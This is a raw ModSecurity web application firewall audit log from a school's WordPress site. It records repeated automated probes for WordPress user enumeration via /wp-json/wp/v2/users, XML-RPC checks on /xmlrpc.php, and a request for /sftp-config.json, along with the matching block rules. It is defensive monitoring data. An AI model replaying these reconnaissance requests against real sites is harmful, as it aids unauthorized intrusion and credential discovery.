--d9999012-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746834186239477 950 (- - -) Stopwatch2: 1746834186239477 950; combined=401, p1=358, p2=0, p3=0, p4=0, p5=42, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9999012-Z-- --c62b1956-A-- [10/May/2025:06:52:58 +0700] aB6VWsi6w7GTj2w44Z6aIAAAANE 103.236.140.4 49490 103.236.140.4 8181 --c62b1956-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c62b1956-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c62b1956-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746834778783679 3455 (- - -) Stopwatch2: 1746834778783679 3455; combined=1472, p1=492, p2=948, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c62b1956-Z-- --b8350e6f-A-- [10/May/2025:06:53:02 +0700] aB6VXquC4AqLGUOyzyX6VAAAAIE 103.236.140.4 49494 103.236.140.4 8181 --b8350e6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b8350e6f-C-- demo.sayHello --b8350e6f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8350e6f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746834782299246 6769 (- - -) Stopwatch2: 1746834782299246 6769; combined=4799, p1=851, p2=3704, p3=38, p4=43, p5=97, sr=101, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8350e6f-Z-- --b6f59729-A-- [10/May/2025:07:00:29 +0700] aB6XHdr9PbfRBMhzxmRZxAAAAEU 103.236.140.4 51198 103.236.140.4 8181 --b6f59729-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b6f59729-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6f59729-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746835229687816 3077 (- - -) Stopwatch2: 1746835229687816 3077; combined=1301, p1=447, p2=824, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6f59729-Z-- --f9b37263-A-- [10/May/2025:07:00:33 +0700] aB6XIdr9PbfRBMhzxmRZxgAAAEc 103.236.140.4 51202 103.236.140.4 8181 --f9b37263-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.27 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f9b37263-C-- demo.sayHello --f9b37263-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9b37263-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746835233797787 5517 (- - -) Stopwatch2: 1746835233797787 5517; combined=4072, p1=531, p2=3303, p3=28, p4=32, p5=103, sr=72, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9b37263-Z-- --dbc90769-A-- [10/May/2025:07:13:38 +0700] aB6aMsi6w7GTj2w44Z6a8gAAAMs 103.236.140.4 51274 103.236.140.4 8181 --dbc90769-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 196.216.70.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.216.70.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dbc90769-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbc90769-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836018551924 3160 (- - -) Stopwatch2: 1746836018551924 3160; combined=1363, p1=474, p2=860, p3=0, p4=0, p5=29, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbc90769-Z-- --90163a31-A-- [10/May/2025:07:23:07 +0700] aB6ca6uC4AqLGUOyzyX7MwAAAJU 103.236.140.4 51342 103.236.140.4 8181 --90163a31-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --90163a31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90163a31-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836587678535 3523 (- - -) Stopwatch2: 1746836587678535 3523; combined=1563, p1=541, p2=985, p3=0, p4=0, p5=36, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90163a31-Z-- --bcc51d0c-A-- [10/May/2025:07:23:13 +0700] aB6ccRLuBiaF9R054QBZVwAAAAg 103.236.140.4 51346 103.236.140.4 8181 --bcc51d0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bcc51d0c-C-- demo.sayHello --bcc51d0c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcc51d0c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836593453614 4916 (- - -) Stopwatch2: 1746836593453614 4916; combined=3813, p1=469, p2=3145, p3=23, p4=26, p5=88, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcc51d0c-Z-- --1c431c06-A-- [10/May/2025:07:23:20 +0700] aB6ceNr9PbfRBMhzxmRZ2wAAAFg 103.236.140.4 51350 103.236.140.4 8181 --1c431c06-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1c431c06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c431c06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836600098761 3150 (- - -) Stopwatch2: 1746836600098761 3150; combined=1401, p1=505, p2=866, p3=0, p4=0, p5=30, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c431c06-Z-- --6171a96a-A-- [10/May/2025:07:23:26 +0700] aB6cfquC4AqLGUOyzyX7NAAAAJc 103.236.140.4 51354 103.236.140.4 8181 --6171a96a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6171a96a-C-- demo.sayHello --6171a96a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6171a96a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836606701090 6646 (- - -) Stopwatch2: 1746836606701090 6646; combined=4706, p1=664, p2=3786, p3=61, p4=36, p5=94, sr=121, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6171a96a-Z-- --aa23d763-A-- [10/May/2025:07:23:27 +0700] aB6cf9r9PbfRBMhzxmRZ3QAAAEI 103.236.140.4 51356 103.236.140.4 8181 --aa23d763-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aa23d763-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa23d763-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836607549933 2510 (- - -) Stopwatch2: 1746836607549933 2510; combined=1153, p1=419, p2=705, p3=0, p4=0, p5=29, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa23d763-Z-- --b132314a-A-- [10/May/2025:07:23:29 +0700] aB6cgRLuBiaF9R054QBZWAAAAAc 103.236.140.4 51362 103.236.140.4 8181 --b132314a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b132314a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b132314a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836609545307 2367 (- - -) Stopwatch2: 1746836609545307 2367; combined=1059, p1=386, p2=647, p3=0, p4=0, p5=26, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b132314a-Z-- --94732c1b-A-- [10/May/2025:07:23:30 +0700] aB6cgsi6w7GTj2w44Z6a_AAAAMk 103.236.140.4 51364 103.236.140.4 8181 --94732c1b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.115 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --94732c1b-C-- demo.sayHello --94732c1b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --94732c1b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836610625154 4723 (- - -) Stopwatch2: 1746836610625154 4723; combined=3685, p1=442, p2=3040, p3=25, p4=27, p5=89, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94732c1b-Z-- --43efac47-A-- [10/May/2025:07:23:33 +0700] aB6chRLuBiaF9R054QBZWwAAABA 103.236.140.4 51372 103.236.140.4 8181 --43efac47-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.243 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --43efac47-C-- demo.sayHello --43efac47-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --43efac47-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836613815795 5031 (- - -) Stopwatch2: 1746836613815795 5031; combined=3871, p1=451, p2=3205, p3=23, p4=24, p5=98, sr=65, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43efac47-Z-- --f3003a71-A-- [10/May/2025:07:23:44 +0700] aB6ckNr9PbfRBMhzxmRZ4AAAAEY 103.236.140.4 51380 103.236.140.4 8181 --f3003a71-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f3003a71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3003a71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836624186713 2835 (- - -) Stopwatch2: 1746836624186713 2835; combined=1226, p1=388, p2=803, p3=0, p4=0, p5=34, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3003a71-Z-- --76fe670b-A-- [10/May/2025:07:23:44 +0700] aB6ckKuC4AqLGUOyzyX7NgAAAIA 103.236.140.4 51382 103.236.140.4 8181 --76fe670b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --76fe670b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76fe670b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836624359471 2000 (- - -) Stopwatch2: 1746836624359471 2000; combined=937, p1=323, p2=587, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76fe670b-Z-- --59cde170-A-- [10/May/2025:07:23:47 +0700] aB6ck9r9PbfRBMhzxmRZ4QAAAEU 103.236.140.4 51390 103.236.140.4 8181 --59cde170-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.23 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --59cde170-C-- demo.sayHello --59cde170-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --59cde170-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836627940108 6125 (- - -) Stopwatch2: 1746836627940108 6125; combined=4409, p1=564, p2=3617, p3=33, p4=33, p5=94, sr=79, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59cde170-Z-- --d733a07b-A-- [10/May/2025:07:23:47 +0700] aB6ckxLuBiaF9R054QBZXwAAABQ 103.236.140.4 51392 103.236.140.4 8181 --d733a07b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d733a07b-C-- demo.sayHello --d733a07b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; 